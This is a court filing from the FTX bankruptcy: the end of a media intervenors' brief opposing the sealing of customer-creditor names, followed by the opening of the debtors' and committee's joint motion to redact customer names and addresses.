30. Mr. Cofksy's experiment—one based on a non-random sampling and a concededly "[un]sophisticated methodology," Tr. of Second Day Hrg. 50:8–9—fails to establish that FTX's competitors would or could operationalize the names of customer-creditors to Debtors' disadvantage. At most, it establishes that if FTX's approximately nine million customer-creditors were named in public filings, an unknown number of unidentified competitors of FTX might Google (or otherwise search for) an unknown number of them in an attempt to discover their contact information; in doing so, these unknown competitors might succeed in discovering the contact information of an unknown percentage of FTX's individual creditors with non-generic names—some or all of whom may be also be FTX customers, and some or all of whom, if customers at all, may *already* be customers of competing crypto exchanges. This is speculation all the way down. It fails, moreover, to address the numerous customer-creditors of FTX who have self-identified through online statements—including not only individual creditors, but institutional creditors.

31. The issue presented here is strikingly similar to the one faced by the Bankruptcy Court for the Southern District of New York in *Celsius*, 644 B.R. at 282. The debtors in *Celsius*—a cryptocurrency exchange and affiliated entities—sought to seal their creditor list on identical grounds; they argued, *inter alia*, that if the list was "publicly disclosed their competitors would gain a 'significant competitive advantage by having access to the complete list of the Debtors'

worldwide customer base,' which 'would significantly decrease the value of the customer list as an asset in any future potential asset sale.'" *Id.* The court disagreed, noting two logical gaps in the debtors' arguments. First, the court observed that the debtors' activity "ha[d] not won many fans among [d]ebtors' customers" and that the "[d]ebtors' business model [had] substantially changed." *Id.* at 291. Second, the debtors "fail[ed] to address with evidence whether creditors who deposited crypto assets with the [d]ebtors also maintain accounts with the [d]ebtors' competitors." *Id.* at 292.

32. The same reasoning applies here and should lead to the same result. First, the spectacular mismanagement of creditors' crypto assets by FTX certainly has not won many fans among FTX's customers.[6] Debtors' claim that FTX's customer-creditor list is a valuable asset rests on the implicit (and faulty) assumption that FTX's customers represent an especially crypto-friendly segment of consumers—something that might have been true before FTX's collapse cost its customers billions of dollars, but is unlikely to be true now. Indeed, any FTX customers who remain interested in crypto services have likely sought out FTX's competitors on their own initiative, given that FTX's platform has been "disabled." D.I. 1137 ¶ 26. Consequently, it is likely that FTX's competitors have *already* reaped any competitive advantage that FTX's customer list might purportedly confer.

33. Second, as in *Celsius*, the record does not establish that FTX's customers used FTX on an exclusive basis. *Cf.* Tr. of Second Day Hrg. 94:11–13 (statement of Debtors' counsel that

---

[6] *See* Declaration of John J. Ray III in Support of Chapter 11 Petitions and First Day Pleadings at ¶ 5, D.I. 24 ("Never in my career have I seen such a complete failure of corporate controls and such a complete absence of trustworthy financial information as occurred here. From compromised systems integrity and faulty regulatory oversight abroad, to the concentration of control in the hands of a very small group of inexperienced, unsophisticated and potentially compromised individuals, this situation is unprecedented.").

13

A0200

FTX's customers are "certainly free to go to a competitor, self-identify themselves to a competitor, and open an account somewhere else *if they haven't already*") (emphasis added).

34. Significantly, while Mr. Cofsky's testimony at the Second Day Hearing included references to the *Celsius* bankruptcy proceedings, Mr. Cofsky did not testify that disclosing the names of Celsius' customer-creditors in public filings had had a significant effect on the valuation of Celsius' assets; nor have the parties proffered any evidence to that effect. *See* Tr. of Second Day Hrg. 29:9–15.[7]

35. Seeking to avoid the outcome in *Celsius*, Debtors pointed the Court to its earlier determination in *In re Cred*, No 20-12836 (JTD) (Dec. 18, 2020). *See, e.g.*, D.I. 407 ¶ 18. There, the Court permitted the debtor—a Bitcoin concern—to file the names and addresses of its customers under seal. *Cred*, D.I. 277 ¶ 113:23–114:16. Respectfully, Media Intervenors submit that *Cred* is no more binding on this Court than *Celsius*, and for the reasons stated above, the facts of this matter are more similar to those at issue in *Celsius* than those at issue in *Cred*.

36. Matters arising outside the cryptocurrency context confirm Media Intervenors' position: courts have routinely rejected sealing requests that were unsupported by specific evidence of concrete commercial harms. In one of the earliest cases analyzing the § 107(b)(1) disclosure exemption for confidential commercial information, *Itel Corp.*, 17 B.R. at 943, the

---

[7] Mr. Cofsky also made reference to his understanding of *In re Voyager Digital Holdings, Inc.*, No. 22-10943 (MEW) (Bankr. S.D.N.Y. July 8, 2022), in which the court granted the debtors' request to redact their customers' personal information, including their names, under § 107(b). *See id.* (D.I. 113). Notably, although Mr. Cofsky testified that he reviewed "the bids that had been submitted in the *Voyager* case," he did not testify that customers' anonymity was among the "incremental elements of value" allocated to each customer by Voyager's potential buyers—much less that disclosing the names of the customers in that case would have significantly affected the "incremental" value assigned to each account. Tr. of Second Day Hearing 29:9–21. Indeed, Mr. Cofsky did not testify as to the number of *Voyager* bids he reviewed or the methodology he employed in assessing the "incremental elements of value" purportedly assigned to customer accounts by potential buyers in that matter. *Id.*

Bankruptcy Appellate Panel of the Ninth Circuit denied a debtor's request to impound its creditor list on the grounds that "various sophisticated investors are attempting to utilize the debtor's financial difficulties to purchase the debtor's debentures from public debenture holders at depressed prices." *Id.* The court concluded that "[w]hile it is conceivable that the identity and addresses of creditors would fall into th[e] category [of commercial information], it is not likely and, in any event, no evidence or contention was presented in this light." *Id.* at 944.

37.  The court drew a similar conclusion in *Purdue Pharma*, 632 B.R. at 40—a bankruptcy matter, like this one, that was the subject of immense public interest.  There, the Sackler family sought to keep the names of certain business counterparties and investment advisors under seal, for fear that disclosure would prompt those individuals to cease or limit business with the Sacklers as a result of negative associational publicity.  The court found that the Sacklers had failed to make the "particularized" showing required or provide "a further description of what the concern is *in real terms*." *Id.* (emphasis added). The court ultimately rejected the Sacklers' sealing request, finding their proffered evidence—newspaper articles—"largely speculative" as to the motivations of those affiliates who had previously terminated business relations "and therefore doubly speculative that still unnamed counterparties that are identified . . . would terminate business relationships upon the release of their names." *Id.* at 44. Here, too, Debtors and the Committee have not made any concrete, non-speculative showing that harm will result from the disclosure of the identities of the customer-creditors.

38.  In some cases, courts have sealed overlapping lists of customers and creditors—but only when the identities of the debtor's customers were the debtor's "primary asset."  *See*, *e.g.*, *In re The Frontier Group, LLC*, 256 B.R. 771, 773 (Bankr. E.D. Tenn. 2000) (granting the debtor's sealing request where the debtor, a brokerage agency arranging for physicians to serve in various

client hospitals, demonstrated that its physician list was its "primary asset" and that disclosure would enable competitors "to view the list, identify its contracting physicians, and recruit those physicians away from the [d]ebtor"). For example, in *In re Northstar Energy, Inc.*, 315 B.R. 425, 427-29 (Bankr. E.D. Tex. 2004), a debtor sought to seal its list of investors because "investor procurement functions [we]re *crucial* to its business plan," and "those functions would be severely jeopardized by the unrestricted publication of its investor list." *Id.* (emphasis added). Because disclosure of the debtor's investors would "expose the heart and soul of [its] commercial operations," the court held that the list constituted "confidential commercial information" and granted the debtor's sealing request under § 107(b)(1). *Id.* at 429-30. Here, neither the Committee nor Debtors have proffered evidence that the names of FTX's customers are FTX's "heart and soul." *Id.* Instead, Mr. Cofsky testified that "a significant component of the business is the customers themselves," and that "what the customers choose to do going forward will be a significant driver of value." Tr. of Second Day Hrg. 30:19–23. Customers' choices are, of course, a significant driver of value in most business contexts; this commonplace observation hardly establishes that the anonymity of FTX's customers is essential to the value of FTX's assets.

39. For at least these reasons, Debtors' proffered evidence—on which the Committee largely relies—fails to establish that the names of FTX's customers constitute confidential commercial information within the meaning of § 107(b)(1); further and continued sealing on the basis of that evidence is unwarranted.

**ii. The Committee members' preference for anonymity does not render their names confidential commercial information.**

40. The Committee also advances its own, novel theory for sealing under § 107(b)(1), asserting that its members' names "qualify as 'confidential commercial information'" because "general anonymity" was "a unique feature [of FTX] that the [Committee] Members relied on

16

when depositing their assets on the platform."  D.I. 1137 ¶ 39.  In support of that theory, the Committee relies on the Member Declaration, D.I. 1157.  *Id.*

41.  As an initial matter, the Committee's reliance on the Member Declaration as evidence in support of redacting its Rule 2019 Statement is improper.  The Member Declaration is, itself, under seal.  The redacted version of the Member Declaration available on the public docket not only conceals the name of the declarant, but also appears to obscure large swaths of the declarant's assertions regarding (a) his or her professional qualifications and (b) the injuries that he or she will purportedly suffer if his or her name is disclosed pursuant to this litigation.  D.I. 1157 ¶¶ 9–11.  This insulates the Member Declaration from any meaningful adversary testing. Media Intervenors are unable to, for instance, assess the qualifications of the declarant, determine whether the redacted portions of the Declaration contain factual assertions based on the declarant's personal knowledge, or challenge the veracity or legal relevance of the redacted portions of the Declaration.  For these reasons, alone, the Court should decline to consider the Member Declaration.  *See, e.g.*, *In re DBSI, Inc.*, 405 B.R. at 704 (declining to consider the declaration of a declarant whom the opposing party was not given an opportunity to cross-examine); *Fidelity*, 2012 WL 2317097 at *2 (denying plaintiff's application to seal declarations where the declarations "provide[d] the only factual basis for plaintiff's assertion[s] and where "[p]ermitting the declarations to be filed under seal in their entireties would deprive the public of the information it is entitled to, namely, the basis for this court's decision"; stating "[t]his is not a secret court, and it will not decide this [matter] based upon secret evidence").

42.  In any event, the Committee's legal argument is baseless.  The Committee asserts that its members "should not be required to waive their contractual right to confidentiality as a condition of their participation in these bankruptcy cases to recover their stolen assets."  D.I. 1137

17

**A0204**

¶ 39. But parties who voluntarily avail themselves of the U.S. bankruptcy system by pursuing claims against debtors possess no "contractual right to confidentiality" enforceable against bankruptcy courts or the public. *See In re Avaya, Inc.,* 2019 WL 1750908 at *7 (Bankr. S.D.N.Y. 2019) (explaining that bankruptcy claimant "waived his privacy rights" by filing claim). *See also* D.I. 142 at 48:1–3 (Debtors' counsel noting that some customer-creditors have "voluntarily come forward and have started to put claims on the docket; that is their prerogative . . . that is self-identification"). Put differently, the public's presumptive right of access to bankruptcy filings, which derives from both the First Amendment and the Bankruptcy Code, cannot be contracted away. *See Samsung Elecs. Co. v. Imperium IP Holdings (Cayman), Ltd.*, No. CV 15-1059, 2017 WL 11573695 at *3 (D. Del. Aug. 28, 2017) (stating that the parties' "private agreement does not govern [the court's] obligation to ensure public access"). *Cf. San Jose Mercury News, Inc. v. U.S. Dist. Ct.--N. Dist. (San Jose)*, 187 F.3d 1096, 1101 (9th Cir. 1999) (stating that "[t]he right of access to court documents belongs to the public," and parties cannot "bargain that right away" through a stipulated protective order).

43. Relatedly, the Committee contends that its members' names constitute confidential commercial information because its members expected their interactions with FTX to remain anonymous. D.I. 1137 ¶ 39. But the Committee cites no authority whatsoever holding that the test for confidential commercial information under § 107(b)(1) turns on a customer's expectations—and none exists. To the contrary, courts have repeatedly rejected sealing requests based on an individual's "penchant for secrecy." *See In re Avaya, Inc.*, 2019 WL 1750908 at *6 ("[The claimant's] penchant for secrecy and general fear of identity theft are doubtless shared by a substantial portion of the populace but do not constitute cause for the issuance of a protective order."); *In re MorAmerica Financial Corp.*, 158 B.R. 135 (Bankr. N.D. Iowa 1993) (denying the

18

A0205

debtors' request to seal the names of its creditors "to protect their privacy" on account of "countervailing [policy] considerations"); *In re Bell & Beckwith*, 44 B.R. at 663-64 (finding no basis for sealing as a matter of one's constitutional or civil right to privacy).

44.  The Member Declaration suggests an alternative motive for seeking to seal the names of the Committee members: embarrassment.  The declarant maintains that disclosure of their "personally identifiable information will likely be detrimental to [their] professional career because it will reveal a claim that far exceeds the amounts expected to be held by someone in [their] profession."  D.I. 1157 ¶ 10. *See also id.* ¶ 8 ("The disclosure of my personally identifiable information will also likely negatively affect me professionally and socially."). In other words, the declarant would prefer to keep the extent of their wealth (or former wealth) secret from their friends and colleagues.

45.  The Committee does not argue that the declarant's nebulous fears of social or professional embarrassment render the declarant's identity (or any other Committee member's identity) confidential for purposes of § 107(b)(1).  Nor does the Committee argue that the declarant's identity (or any other Committee member's identity) constitutes "scandalous or defamatory matter" within the meaning of § 107(b)(2).  It could not reasonably do so. "The exception to public disclosure under [Section] 107 was never 'intended to save the debtor or its creditors from embarrassment, or to protect their privacy in light of countervailing statutory, constitutional, and policy concerns.'"  *FiberMark, Inc.*, 330 B.R. at 508–09 (quoting *Itel Corp.*, 17 B.R. at 944). *See also Food Mgmt.*, 359 B.R. at 554 ("Section 107(b) is not intended to save the debtor or creditors from embarrassment."); *In re Motors Liquidation Co.*, 561 B.R. 36, 42 (Bankr. S.D.N.Y. 2016) (stating that "'[m]ere embarrassment, or harm to reputation based on nonscandalous, nondefamatory information' is insufficient" to warrant sealing under Section

19

**A0206**

107(b)) (citing 2 Collier on Bankruptcy ¶ 107.03[1][b] (Alan N. Resnick & Henry J. Sommer eds., 16th ed. 2016)).

### iii. Neither the evidence proffered by the Committee nor the evidence proffered by Debtors establishes that a miniscule subset of FTX's customers, such as the names of the Committee members or of FTX's Top 50 Creditors, constitutes confidential commercial information.

46. For the reasons stated above, the record fails to establish that the names of any (let alone all) of FTX's customers, including the members of the Committee, constitute confidential commercial information within the meaning of § 107(b)(1).

47. However, even if, *arguendo*, the evidentiary record were deemed sufficient to justify the continued sealing of *most* of FTX's customers' names, the record contains no evidence that the names of narrow and comparatively miniscule subsets of FTX's millions of customers—such as the names of the Committee members or the names of FTX's top 50 creditors—constitute confidential commercial information within the meaning of § 107(b)(1).

48. Debtors' proffered evidence concerns the purported value of sealing FTX's customer-creditor list *as a whole*; Debtors have proffered no evidence that disclosing the names of FTX's top 50 creditors who are also customers—while continuing to redact the names of FTX's approximately nine million other customer-creditors—would appreciably affect the valuation of FTX's assets.

49. The Committee has proffered no evidence of its own that would establish that disclosing the names of the Committee's members who have elected to participate directly in this proceeding—while continuing to redact the names of FTX's approximately nine million other customer-creditors—would appreciably affect the valuation of FTX's assets.

50. Similarly, neither Debtors nor the Committee have proffered evidence that disclosing the names of only the *institutional* customer-creditors on the top-50 creditors list—while

continuing to redact the names of FTX's individual customer-creditors—would appreciably affect the valuation of FTX's assets.

51.  Therefore, if the Court continues or extends the Redaction Deadline on the basis of § 107(b)(1), the Court should nevertheless find that the public's presumptive right of access is not overcome as to (a) the names of FTX's customers who are also among Debtors' top 50 creditors; (b) the names of the Committee members; or (c) at minimum, the names of FTX's institutional customers who are among Debtors' top 50 creditors.

## C.  THE PARTIES FAIL TO ESTABLISH THAT CONTINUED SEALING OF THE NAMES OF FTX'S CREDITORS IS PERMISSIBLE UNDER SECTION 107(C).

52.  Even when an individual's information is not subject to redaction under § 107(b), a court may order the information redacted "for cause"—*i.e.*, if the court finds that disclosure "would create *undue* risk of identity theft or other unlawful injury to the individual or the individual's property."  11 U.S.C. § 107(c) (emphasis added).  The Committee contends that cause exists to redact the names of its individual members pursuant to § 107(c) for two general reasons.  *See* D.I. 45 ¶¶ 16–23; D.I. 407 ¶ 23; D.I. 1137 ¶¶ 19–34.  First, the Committee asserts that disclosing the names of its individual members would subject them to an undue risk of identity theft or unlawful injury; this argument fails because it is contrary to the weight of authority and unsupported by evidence.  Second, the Committee asserts that its members' hypothetical exposure to fines pursuant to the European Union's General Data Protection Regulation ("GDPR") constitutes an undue risk of unlawful injury; this argument fails because it is speculative, fails even to assert the possibility of an injury that is "unlawful"; and seeks to elevate foreign law over the governing laws of the United States.

53.  Debtors, too, assert that cause exists to seal the names of FTX's individual customer-creditors pursuant to § 107(c), D.I. 45 ¶ 17–19, but they recently declined to press that argument

or proffer supporting evidence (while reserving the right to seek redaction under § 107(c) at a future date). D.I. 407 ¶ 23.

54.  Both parties correctly limit their arguments under § 107(c) to individual customer-creditors—*i.e.*, customer-creditors who are natural persons. D.I. 47 ¶ 23; D.I. 1137 ¶ 20; *Celsius*, 644 B.R. at 294 (explaining that § 107(c) does not apply to "business entities").

### i.  The parties fail to establish that disclosing the names of FTX's individual creditors will subject those creditors to an undue risk of identity theft or other unlawful harm.

55.  The Committee contends that "compelled disclosure of an individual's identifying information in bankruptcy filings" "increases" an "inherent risk of identity theft." *Id.* ¶ 21. Relatedly, it asserts that revealing the "Personally Identifying Information" of FTX's individual customers would expose them to a grab-bag of other forms of theft, such as "stealing an online wallet" or "physical robbery." D.I. 1137 ¶ 25. These contentions falter out of the gate.

56.  For purposes of § 107(c), the only pieces of "identifying information" at issue here are the names of FTX's individual customers—who, as creditors, are parties to this litigation. It is axiomatic that public access to the names of the parties in bankruptcy proceedings does not inherently expose them to an "*undue* risk of identity theft" or other unlawful harm. 11 U.S.C. § 107(c) (emphasis supplied); *Avaya*, 2019 WL 1750908 at *6 ("If a desire for secrecy or general fear of identity theft constituted cause for redaction, a court would have to seal or redact all personal information in every case.").

57.  Indeed, the names of parties to bankruptcy litigation—and all other types of litigation—are public as a matter of course. The annals of the judiciary, including of bankruptcy courts, are awash with the names of debtors, creditors, plaintiffs, defendants, lay witnesses, expert witnesses, bystanders, judges, attorneys, elected officials, U.S. businesses, international businesses, and sundry others. These millions of names are not redacted because identifying the

22

**A0209**

participants in legal proceedings, including bankruptcy proceedings, is consistent with—and required by—the tradition of openness that is a core feature of this nation's administration of justice. *In re Blake*, 452 B.R. 1, 10 (Bankr. D. Mass. 2011) ("[T]he presumption of public access to documents filed in a bankruptcy case is paramount…"); *Anthracite*, 492 B.R. at 171 ("A court's ability to limit the public's right to access remains an extraordinary measure that is warranted only under rare circumstances as public monitoring is an essential feature of democratic control.") (internal quotation marks omitted); *Crawford*, 194 F.3d at 960 (explaining that the government's interest in ensuring public access to court records "is of special importance in the bankruptcy arena, as unrestricted access to judicial records fosters confidence among creditors regarding the fairness of the bankruptcy system").

58. The Committee identifies no contrary authority. Instead, it cites the transcripts of several hearings, D.I. 1137 ¶ 22, in which bankruptcy courts permitted the redaction of individuals' home and/or email addresses pursuant to § 107(c), but *not* individuals' names.[8]  *In re Art Van Furniture, LLC*, No. 20-10553 (CSS) (Bankr. D. Del. Mar. 10, 2020), Tr. 23:16–18 (Doc. 82) (counsel's explanation that the debtor sought "to redact the home addresses of the employees and customer-creditors of the debtors"); *id.* Tr. 24:6–7 (counsel's statement that "redacting the home addresses, *not the names* of those creditors, will not impinge on the bankruptcy process") (emphasis added); *In re Clover Techs. Grp., LLC*, Case No. 19-12680 (KBO) (Bankr. D. Del. Jan. 22, 2020), Tr. 25:9–10 (Doc. 146) (permitting redaction of individuals' addresses); *In re Forever 21, Inc.*, Case No. 19-12122 (KG) (Bankr. D. Del. Dec. 19, 2019), Tr. 63:2–3 (Doc. 605) (granting

---

[8] Debtors do the same. *See* D.I. 45 ¶¶ 17–19 (citing *In re Charming Charlie Holdings, Inc.*, No. 19-11534 (CSS) (Jul. 11, 2019) (Doc. 4) (motion to seal addresses of debtor's employees); *In re Windstream Holdings, Inc.*, No. 19-22312 (RDD) (Bankr. S.D.N.Y. Mar. 25, 2019), Tr. at 88:6–12, 89:5–8 (Doc. 173) (discussing redaction of employees' home addresses)).

motion to redact creditors' home addresses). Needless to say, these authorities support Media Intervenors' position, not the Committee's.[9]

59. The Committee also relies on *In re Endo Int'l plc*, No. 22-22549 (JLG), 2022 WL 16640880, at *10-12 (Bankr. S.D.N.Y. Nov. 2, 2022), but that unpublished decision is inapposite.[10] In *Endo*, the bankruptcy court for the Southern District of New York permitted redaction of the names of individual U.S. and international claimants because to do otherwise would associate said individuals with "an unfavorable medical condition." *Id.* at *12 (quotation marks omitted). The court added, in dicta, that revealing the names of the individual claimants would "heighten the risk to them of identity theft"—particularly medical identity theft. *Id.* (citing *Attias v. Carefirst, Inc.*, 865 F.3d 620, 628 (D.C. Cir. 2017) (concluding that publication of health insurance customers' names, birth dates, email addresses, and "subscriber ID numbers" created a "substantial risk of identity fraud"); Gregory S. Gaglione, Jr., *The Equifax Data Breach: An Opportunity to Improve Consumer Protection and Cybersecurity Efforts in America*, 67 BUFF. L. REV. 1133, 1212 n.257 (2019) (analyzing *Attias* and describing some consequences of medical identity theft)). The present case is entirely different: doing business with a cryptocurrency exchange does not associate an individual with an "unfavorable medical condition," nor does it have any connection to fraudsters' ability to obtain medical care by impersonating a member of an insurance plan. *See Attias*, 865 F.3d at 628.

---

[9] As noted above, Media Intervenors do not object to the redaction of home and email addresses. D.I. 196 ¶ 18.

[10] The Committee's motion erroneously cites *In re Endo Int'l plc*, No. 22-22549-JLG, 2022 WL **16935997**, at *10–12 (Bankr. S.D.N.Y. Nov. 14, 2022), a decision that does not address redaction. D.I. 1137 ¶ 21.

60. In *Celsius*, a more pertinent decision, the bankruptcy court for the Southern District of New York held that redacting the names of individual cryptocurrency customers was unwarranted under § 107(c) when, as here, those customers' email and physical addresses were not made public. *Celsius*, 644 B.R. at 294. The Committee makes no effort to distinguish *Celsius*; nor could it. Instead, it attempts to neutralize the decision by asserting that *Celsius* supposedly has led to "severe consequences" for crypto users. D.I. 1137 ¶ 27. But the Committee's own proffered evidence reveals that *Celsius* has, at worst, led to "certain of the [d]ebtors' customers" receiving an unknown number of ham-fisted, easily detectable phishing emails, which those customers forwarded to the debtors' counsel of record, prompting counsel to post a routine warning on the public docket. *See* Exhibit B to D.I. 1137.

61. There is nothing "severe" about receiving phishing emails. Far from posing a "unique" risk to cryptocurrency users, D.I. 1137 ¶ 27, phishing emails (often but not always caught by spam filters) are a ubiquitous feature of the digital world; anyone with an email account knows to be wary of them. *See, e.g.*, Federal Trade Commission, *How to Recognize and Avoid Phishing Scams* (Sept. 2022), https://consumer.ftc.gov/articles/how-recognize-and-avoid-phishing-scams. The record offers no basis on which to conclude that users of cryptocurrency exchanges are more susceptible to phishing scams than other litigants named in bankruptcy proceedings—many of whom, like cryptocurrency users, doubtless use the internet to access their bank accounts, credit cards, retirement funds, and other important assets. Indeed, common sense suggests that cryptocurrency users, by and large, possess *greater* digital fluency than the average customer or creditor named in bankruptcy court filings. It is unsurprising, then, that despite the Committee's breathless reference to "the fallout of the *Celsius* decision," D.I. 1137 ¶ 27, the record contains no

25

**A0212**

evidence that *any* individuals named in the *Celsius* litigation have fallen victim to theft—either of their identities or their crypto assets.[11]

62. The same goes for the other forms of theft that, according to the Committee, might befall any of FTX's creditors whose names are made public: "stealing an online wallet," "physical robbery," "theft of private keys," and "SIM swapping." D.I. 1137 ¶ 25 (capitalization altered). Take the first item on the list: stealing an online wallet. Quoting the "Philips Declaration," the Committee asserts that "[i]f a criminal knows that a person holds a wallet on a crypto exchange, as they would if the Personally Identifying Information is disclosed, then they will *inevitably* attempt a variety of means to access that wallet and steal the assets." *Id.* at 10 ¶ 25 (emphasis added). Such speculation cannot possibly overcome the public's statutory and constitutional rights of access to judicial records; after all, one could as well say, "If a criminal knows that a person holds an account with a bank, then they will inevitably attempt a variety of means to access that account and steal the balance."

63. At bottom, the Philips Declaration contains *no* evidence that known holders of cryptocurrency are appreciably more vulnerable to crime than known holders of any other assets. Instead, it offers only a general list of strategies that some unknown number of unsavory persons

---

[11] As noted above, at the Second Day Hearing, Debtors proffered testimony to the effect that searching the names of individuals on the internet might reveal additional information about them. Tr. of Second Day Hrg. 33:19–34:4. But that is hardly surprising or unique to individual customer-creditors of FTX. Indeed, many people in the modern world—including, presumably, many of FTX's former customers—choose to make at least some personal information available online, often on social and professional networking sites. *See, e.g.*, D.I. 1139 ¶ 10 ("[I]t is evident how easy it is for anyone, even those without any specialist investigative skills or experience, to find out a significant amount about a person simply by searching their name, using the 'search' function on LinkedIn."). This circumstance—shared by most individual participants in contemporary bankruptcy matters—does not support redacting the names of individual customer-creditors here. Indeed, it would be perverse if individuals could thwart the public's right of access to bankruptcy filings simply by disclosing information about themselves online and then pointing to the ease with which such personal information can be obtained via internet searches.

may have used an unknown number of times in an effort to target an unknown number of crypto

owners with an unknown rate of success. ECF 1139 ¶ 10. It fails, therefore, to establish cause to

seal the names of any of FTX's customer-creditors—including the members of the Committee—

pursuant to § 107(c).[12]

### ii. The hypothetical operation of foreign law provides no "cause" for redaction under 11 U.S.C. § 107(c).

64. Finally, both Debtors and the Committee assert that disclosing the names of individual

creditors subject to the GDPR may subject them to significant fines. This possibility, according to

the parties, independently constitutes "cause" for sealing pursuant to § 107(c). D.I. 405 ¶ 27; D.I.

1137 ¶ 31. It does not.

65. To start, § 107(c) permits the redaction of judicial records only to ameliorate an

"undue risk of *unlawful* injury." 11 U.S.C. § 107(c) (emphasis added). Yet neither Debtors nor

the Committee argue that the (hypothetical) imposition of a penalty pursuant to the GDPR would

constitute an "unlawful injury." *Id.* It is easy to see why: a penalty imposed by operation of law

is not generally thought to be "unlawful." It is certainly not like "identity theft," the only form of

"unlawful injury" expressly identified in § 107(c). *See McDonnell v. United States*, 579 U.S. 550,

568–69 (2016) ("Under the familiar interpretive canon *noscitur a sociis*, a word is known by the

company it keeps."). This should end the matter.

---

[12] Invoking Federal Rule of Bankruptcy Procedure 9037(d), the Committee also seeks a protective order permitting it to redact the names of its members who are business entities. D.I. 1137 ¶ 42. The Committee offers no legal argument, and proffers no additional evidence, in support of this request; instead, it relies on the arguments and evidence submitted in support of its request to seal the names of its individual members under § 107(c). *Id.* The arguments and evidence that the Committee marshals in support of its § 107(c) request are even *more* inapt, speculative, and unavailing when applied to business entities (as opposed to individuals). Consequently, there exist no grounds for entry of a protective order under Rule 9037(d).

66. But even if, *arguendo*, a penalty incurred by operation of the GDPR could constitute an "unlawful injury" within the meaning of § 107(c), the likelihood that either party will suffer such an injury is purely speculative. The parties invite the Court to conclude that publicly filing the names of FTX's creditors as required by U.S. law would cause them to incur serious financial penalties under the GDPR, but they adduce no evidence that the GDPR has been, or ever will be, enforced in such a way.

67. Finally, even if, *arguendo*, a penalty incurred by operation of the GDPR could constitute an "unlawful injury" within the meaning of § 107(c), and is deemed more than a mere speculative possibility, sealing would still be unwarranted, because neither Debtors nor the Committee offer any "legal authority explicitly dictating why the [GDPR] should apply to" a bankruptcy case "filed in the United States, or specifically, why [a] foreign law[] would take precedence in a situation where United States law requires the disclosure." *Celsius*, 644 B.R. at 295. Put differently: this Court is neither bound by nor called to adjudicate foreign law; it is bound by and called to adjudicate the law of the United States. The law of the United States— constitutional and statutory—grants the public a strong presumptive right to inspect bankruptcy filings. This right cannot be abrogated by a party's assertion of legal obligations under foreign law, including a party's desire to avoid paying fines to which, under foreign law, it *might* be subject. The entitlement of the press and public in the United States to oversee the workings of bankruptcy courts in this country does not bend to the policy preferences of the European Union.

## **CONCLUSION**

For the foregoing reasons, Media Intervenors respectfully request that the Court deny the

Committee's motion to seal and decline to extend or continue the Redaction Deadline.

Respectfully submitted,

Dated: April 5, 2023

/s/ David L. Finger
David L. Finger (ID #2556)
FINGER & SLANINA, LLC
One Commerce Center
1201 N. Orange St., 7th fl.
Wilmington, DE 19801
(302) 573-2525
dfinger@delawgroup.com

Katie Townsend (pro hac vice)
THE REPORTERS COMMITTEE FOR
FREEDOM OF THE PRESS
1156 15th Street NW, Suite 1020
Washington, DC 20005
202.795.9300
ktownsend@rcfp.org
*Counsel for Media Intervenors*

# IN THE UNITED STATES BANKRUPTCY COURT
# FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Jointly Administered) |
| | **Hearing Date: May 17, 2023 at 1:00 p.m. ET**<br>**Obj. Deadline: May 4, 2023 at 4:00 p.m. ET** |

## JOINT MOTION OF THE DEBTORS AND THE OFFICIAL COMMITTEE OF UNSECURED CREDITORS FOR AN ORDER AUTHORIZING THE MOVANTS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS

FTX Trading Ltd. and its affiliated debtors and debtors-in-possession (collectively, the "Debtors") and the Official Committee of Unsecured Creditors appointed in the above-captioned cases (the "Committee" and, together with the Debtors, the "Movants"), hereby jointly submit this motion (this "Motion") for entry of an order, substantially in the form attached hereto as Exhibit A (the "Order"), pursuant to sections 105(a) and 107 of title 11 of the United States Code, 11 U.S.C. §§ 101 *et seq.* (the "Bankruptcy Code") and rule 9018 of the Federal Rules of Bankruptcy Procedure (the "Bankruptcy Rules"), authorizing each of the Movants to redact (a) the names, addresses and e-mail addresses of all of the Debtors' customers from any filings with the Court or made publicly available in these Chapter 11 Cases (as defined below) and (b) the names, addresses and e-mail addresses of any creditors or equity holders who are natural persons and who are protected by the GDPR or Japan data privacy laws from any filings with the Court or made

---

[1] The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification number are 3288 and 4063 respectively. Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein. A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

{1368.002-W0070617.}

publicly available in these Chapter 11 Cases.  In support of the Motion, the Movants respectfully state as follows:

<div align="center">**<u>Preliminary Statement</u>**</div>

1.      In January, the Court determined that the Debtors had provided evidence that their customer list was protected by Section 107(b)(1) of the Bankruptcy Code, and thus authorized redaction of the Debtors' customers' names, in addition to addresses and e-mail addresses, for a period through April 20, 2023.  The Debtors have continued to make significant progress in their Chapter 11 Cases, but the considerations that were the subject of testimony from the Debtors' investment banker in January remain ongoing today.

2.      Specifically, the Debtors have not yet determined how they will utilize their customer lists consisting of more than 9 million names and addresses: whether they will be utilized as part of a reorganization or monetized through a sale process.  The Debtors' work is advancing, but more remains to be done.  The basic premise that was the basis for the Court's order entered in January, however—that the customer lists, including names and contact information for individual and institutional customers, are an important asset of the Debtors and a potential source of value—remains true today.  The Debtors should be afforded additional time to attempt to realize that value for the benefit of their creditors.  Bankruptcy Code section 107(b)(1) continues to apply and provides grounds to extend the Redaction Deadline (as defined below) by another three months.

3.      In addition, the circumstances of these Chapter 11 Cases dictate that disclosing the names of the Debtors' non-institutional customers (the "<u>Individual Customer Names</u>") exposes those individuals to a very present risk of financial and physical harm.  Therefore, Bankruptcy Code section 107(c)(1) provides an independent basis to permit the Debtors and the Committee to redact *all* Individual Customer Names, addresses and e-mail addresses from

<div align="center">**A0218**</div>

public filings.

4.     Cryptocurrency is unique in both its anonymity and the permanence of its transactions, presenting risks in these Chapter 11 Cases not prevalent in others.  Examples are replete of cryptocurrency investors being targeted by malefactors through internet-related scams and threats designed to steal the customer's assets, and publishing the Individual Customer Names will provide a list of targets to those with criminal intent.  As a result, in order to protect customers from such harm, motions to seal individual customers' names have been filed in every cryptocurrency bankruptcy case to date.[2]

